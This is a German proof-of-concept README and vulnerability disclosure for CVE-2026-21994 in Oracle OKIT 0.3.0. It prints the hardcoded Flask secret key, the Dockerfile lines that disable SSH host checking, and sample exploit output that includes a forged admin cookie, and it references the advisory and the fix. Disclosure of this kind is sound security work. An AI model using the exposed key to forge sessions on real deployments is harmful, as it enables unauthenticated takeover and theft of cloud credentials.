
Proof-of-Concept-Exploit für CVE-2026-21994, der die nicht authentifizierte Fälschung von Admin-Sitzungen über einen fest verdrahteten Flask-SECRET_KEY sowie die Umgehung der SSH-Host-Verifizierung in Oracle OKIT demonstriert.
Oracle OKIT (oci-designer-toolkit) Version 0.3.0 enthält zwei kritische Fehlkonfigurationen, die sich zu einer vollständigen Übernahme ohne Authentifizierung verketten. Ein hartcodierter Flask-SECRET_KEY, der im öffentlichen Repository offengelegt ist, erlaubt jedem Angreifer, ein gültiges Admin-Sitzungscookie zu fälschen — ohne Anmeldedaten. Zusätzlich deaktiviert das Docker-Image die SSH-Host-Verifizierung vollständig, wodurch ein Netzwerkangreifer OCI-API-Schlüssel und private Schlüssel während Infrastruktur-Bereitstellungen abfangen kann.
1. Hartcodierter SECRET_KEY — okitclassic/okitserver/config.py:4
SECRET_KEY='8980ffsd675747jjjh'
Flask verwendet diesen Schlüssel, um Sitzungscookies zu signieren. Da er in einem öffentlichen Repository hartcodiert ist, kann ein Angreifer ein gültiges Admin-Cookie fälschen und ohne Anmeldedaten auf das OKIT-Dashboard zugreifen.
2. SSH-Host-Verifizierung deaktiviert — Dockerfile:41
&& echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
Der Container prüft niemals SSH-Host-Fingerabdrücke. Ein Netzwerkangreifer kann Bereitstellungen per MitM angreifen und OCI-Anmeldedaten stehlen.
Führen Sie exploit.py im Verzeichnis des geklonten Repositories aus:
python3 exploit.py
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.
[*] Scanning Dockerfile ...
[!] VULNERABLE — SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.
[*] Forging admin session cookie ...
[!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1...
| CVE-ID | CVE-2026-21994 |
| GitHub-Advisory | GHSA-g6qw-3gmw-m78m |
| CWE | CWE-284 — Unzulässige Zugriffskontrolle |
| Oracle-Advisory-Zuordnung | oracle.com/security-alerts/public-vuln-to-advisory-mapping |
| Oracle-CVE-Referenz | oracle.com/security-alerts/all-oracle-cves |
| Fix | oracle/oci-designer-toolkit#780 |
Entdeckt und gemeldet von Gouri Sankar A — g0w6y